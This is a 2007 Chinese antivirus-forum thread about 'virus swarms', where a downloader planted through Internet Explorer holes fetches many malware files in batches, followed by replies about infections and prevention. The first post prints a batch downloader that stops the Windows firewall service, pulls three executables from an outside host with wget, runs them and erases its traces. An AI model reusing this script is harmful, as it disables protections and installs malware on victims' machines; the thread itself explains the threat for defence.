UFO不幸外人 - 2007-4-11 21:49:00
最近看baohe和阳光写了关于病毒群的问题。其实这个问题早就存在,自从去年8月份把,记不清楚了,那时候就会有病毒群的问题。但是病毒群中病毒数量很少。
到现在这个方法是越演越烈,害得我不敢用本级搜索东西,怕中病毒群。这东西处理起来太麻烦,而且不容易处理干净。只能拿虚拟机,还经常中毒到虚拟机系统不能正常启动。最后就Ghost了。………………
说说病毒群怎么形成的吧。这个还是比较关键的。病毒群一般都是又10到15种病毒组成,但是这些病毒不能一下子下载到计算机中,会引起大家的怀疑,也会出现各种问题,那么就要有一个下载器,专门下载病毒。这个下载器一般都是通过IE的漏洞,下载下来的,然后就可以工作了,分批一步一步下载各种病毒群中的病毒。这就是病毒群的简单形成方法。
以下是一种批处理类型下载器的源码:
@echo off
net stop sharedaccess
del down.exe /删除down.exe文件/
del game.exe /删除game.exe文件/
del bank.exe /删除bank.exe文件/
wget.exe http://www.bartenderofchina.com/gz/down.exe /下载病毒文件1/
wget.exe http://www.bartenderofchina.com/gz/game.exe /下载病毒文件2/
wget.exe http://www.bartenderofchina.com/gz/bank.exe /下载病毒文件3/
down.exe /运行病毒文件/
game.exe
bank.exe
exit /结束/
del up.vbs /清理下载器文件/
del update.bat
del wget.exe
这个只是其中一段bat的代码,当然注释可能有不对的地方。多多提出。
我们需要的是堵住这个源头,那么怎么堵住呢。利用一些监视程序,设置规则。baohe使用的是SSM,瑞星有IE防漏墙(虽然很…………,但是还是可以防住50%的下载器)
说了这么多,我在说说关于病毒群的删除,这个是一只讨论的问题,我认为病毒群的删除还要具体问题具体分析,像baohe和阳光那两篇文章只能针对一部分病毒群,但是还没有写全面,现在各种各样的病毒群出现,无法一一写明,只能扫描SRE日志,然后发布到论坛,来让高手给出解决方法。如果自己试验,一定要找好所有病毒文件,遗留一个就有可能全部病毒回来,很麻烦。
25802580 - 2007-4-11 21:54:00
我正中着这毒呢5555555555555555555555555555555555555
UFO不幸外人 - 2007-4-11 21:57:00
| 引用: |
【25802580的贴子】我正中着这毒呢5555555555555555555555555555555555555
……………… |
发布SRE日志 直接放到论坛上
三月学毒 - 2007-4-11 22:07:00
我前两天就是中了,杀了一天才干掉,见识过它的厉害。希望快点出专杀
UFO不幸外人 - 2007-4-15 19:07:00
没有办法出专杀,这类病毒变化无常
孤独更可靠 - 2007-4-15 19:36:00
最好方法估计也只能防范了
打补丁
不乱上网站
定时清空IE缓存
用非IE核心浏览器
呵呵~
© 2000 - 2026 Rising Corp. Ltd.